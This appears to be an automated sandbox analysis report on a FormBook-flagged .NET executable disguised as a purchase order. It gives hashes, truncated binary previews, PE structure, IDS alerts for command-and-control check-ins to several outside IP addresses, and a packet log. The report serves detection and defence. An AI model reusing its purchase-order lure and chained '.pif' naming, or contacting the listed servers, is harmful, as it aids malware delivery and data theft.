SHA-512:	7DAD8EC1C5040112DEEE48EF6DBD56E7AAC3DB65DEE11568F5E9FEA96B33B2B6030F560C834BA51DCB0CB98EB837C2638E7F9C8B39C1F46395BD8259C88F8937
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.f..............0..D...........b... ........@.. ....................................`..................................b..O...................................La............................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............^..............@..B.................b......H.......,>.. #...........................................................0..0.........}.....(......(......r...po....&.(......(.........0..Y.........{....o....r...p(....,..{....o....r...p(....+....,..s......o......+...{....r...po..........0...........s......o.......0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.... .....?s....o......{........s....o......{....rY..po..

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.8694181258959155
Encrypted:	false
SSDEEP:	384:zZizC2pKXg9eH58VkRS/oFGPikzhlZBBmBi1S0f9EKR4VWjs5anwNmJ8sxSvpphB:z/wJevBzM6RB
MD5:	30ECD7046839AF0716977A9EF6047E60
SHA1:	A1F6517726C9DC0F3D588B947E2AAEB4F849F58C
SHA-256:	472A703381C8FE89F83B0FE4D7960B0942C5694054BA94DD85C249C4C702E0CD
SHA-512:	7DAD8EC1C5040112DEEE48EF6DBD56E7AAC3DB65DEE11568F5E9FEA96B33B2B6030F560C834BA51DCB0CB98EB837C2638E7F9C8B39C1F46395BD8259C88F8937
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.f..............0..D...........b... ........@.. ....................................`..................................b..O...................................La............................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............^..............@..B.................b......H.......,>.. #...........................................................0..0.........}.....(......(......r...po....&.(......(.........0..Y.........{....o....r...p(....,..{....o....r...p(....+....,..s......o......+...{....r...po..........0...........s......o.......0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.... .....?s....o......{........s....o......{....rY..po..

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.8694181258959155
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PURCHASED ORDER OF ENG091.exe
File size:	24'576 bytes
MD5:	30ecd7046839af0716977a9ef6047e60
SHA1:	a1f6517726c9dc0f3d588b947e2aaeb4f849f58c
SHA256:	472a703381c8fe89f83b0fe4d7960b0942c5694054ba94dd85c249c4c702e0cd
SHA512:	7dad8ec1c5040112deee48ef6dbd56e7aac3db65dee11568f5e9fea96b33b2b6030f560c834ba51dcb0cb98eb837c2638e7f9c8b39c1f46395bd8259c88f8937
SSDEEP:	384:zZizC2pKXg9eH58VkRS/oFGPikzhlZBBmBi1S0f9EKR4VWjs5anwNmJ8sxSvpphB:z/wJevBzM6RB
TLSH:	6FB2082573BC6B22F5BD97F258BB352023B93913A472EB190DD940CA0667F904681F6F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.f..............0..D...........b... ........@.. ....................................`................................

File Icon


Icon Hash:	9b1a7a8198a5a5d2

Static PE Info

General

Entrypoint:	0x4062d6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FC6AAC [Tue Oct 1 21:33:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6284	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x17a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x614c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x42dc	0x4400	cc143bc737acb364fdf98cf6755a6fe0	False	0.4015969669117647	COM executable for DOS	5.192462542780009	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x17a4	0x1800	87265c2da95c04b7f45a8d647b761c51	False	0.8264973958333334	data	7.38415857857582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	8a46712090e43f0942113c96a9f957ab	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x8100	0x122c	PNG image data, 189 x 189, 8-bit/color RGBA, non-interlaced	0.9438950988822012
RT_GROUP_ICON	0x933c	0x14	data	1.15
RT_VERSION	0x9360	0x244	data	0.46551724137931033
RT_MANIFEST	0x95b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T11:30:00.590964+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49882	192.243.59.20	80	TCP
2024-10-08T11:30:00.590964+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49882	192.243.59.20	80	TCP
2024-10-08T11:30:00.590964+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49882	192.243.59.20	80	TCP
2024-10-08T11:30:00.590964+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49992	34.205.242.146	80	TCP
2024-10-08T11:30:00.590964+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49992	34.205.242.146	80	TCP
2024-10-08T11:30:00.590964+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49992	34.205.242.146	80	TCP
2024-10-08T11:31:25.738802+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49995	104.21.93.17	80	TCP
2024-10-08T11:31:25.738802+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49995	104.21.93.17	80	TCP
2024-10-08T11:31:25.738802+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	49995	104.21.93.17	80	TCP
2024-10-08T11:31:46.050662+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	50000	91.195.240.19	80	TCP
2024-10-08T11:31:46.050662+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	50000	91.195.240.19	80	TCP
2024-10-08T11:31:46.050662+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	50000	91.195.240.19	80	TCP
2024-10-08T11:32:29.382087+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	50006	3.33.130.190	80	TCP
2024-10-08T11:32:29.382087+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	50006	3.33.130.190	80	TCP
2024-10-08T11:32:29.382087+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.6	50006	3.33.130.190	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 11:30:04.576942921 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:04.581914902 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:04.581990004 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:04.582835913 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:04.587730885 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225514889 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225565910 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225600958 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225622892 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.225635052 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225672007 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225692034 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.225702047 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.225779057 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.236115932 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.236150980 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.236185074 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.236217022 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.236265898 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.236265898 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.240875006 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.240905046 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.240951061 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.247375965 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.247437000 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.247471094 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.247520924 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.294080019 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.313743114 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.313812017 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.313848019 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.313867092 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.313883066 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.313952923 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.318594933 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.318629026 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.318677902 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.318706989 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.318747997 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.318747997 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.330409050 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.330461979 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.330507040 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.330540895 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.330585957 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.330585957 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.335239887 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.335289001 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.335324049 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.335356951 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.335388899 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.335388899 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.340066910 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.340102911 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.340136051 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.340167999 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.340176105 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.340200901 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.340229034 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.344842911 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.344877958 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.344909906 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.344918966 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.344943047 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.344971895 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.344983101 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.345056057 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.402544022 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.402601957 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.402638912 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.402673006 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.402693033 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.402908087 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.407306910 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.407345057 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.407377958 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.407409906 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.407430887 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.407460928 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.407547951 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.412134886 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.412169933 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.412204027 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.412234068 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.412260056 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.412262917 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.419123888 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.419157982 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.419192076 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.419223070 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.419223070 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.419245005 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.423902988 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.423937082 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.423984051 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.424077988 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.424110889 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.424127102 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.428702116 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.428736925 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.428764105 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.428786039 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.428819895 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.428832054 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.428853035 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.428908110 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.433749914 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433784008 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433815956 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433840990 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.433849096 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433882952 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433917046 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433936119 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.433948994 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.433959961 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.433981895 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434014082 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434047937 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434079885 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434088945 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434088945 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434113979 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434146881 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434180021 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434211969 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434221029 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434221029 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434246063 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434278011 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434314013 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434319019 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434346914 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434380054 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434412003 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434418917 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434418917 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.434444904 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434475899 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.434533119 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.481722116 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.491066933 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491208076 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491240978 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491267920 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.491275072 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491307974 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491343021 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.491554022 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491621971 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491656065 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491678953 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.491688013 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491723061 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.491740942 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.491791964 CEST	49710	80	192.168.2.6	63.250.38.167
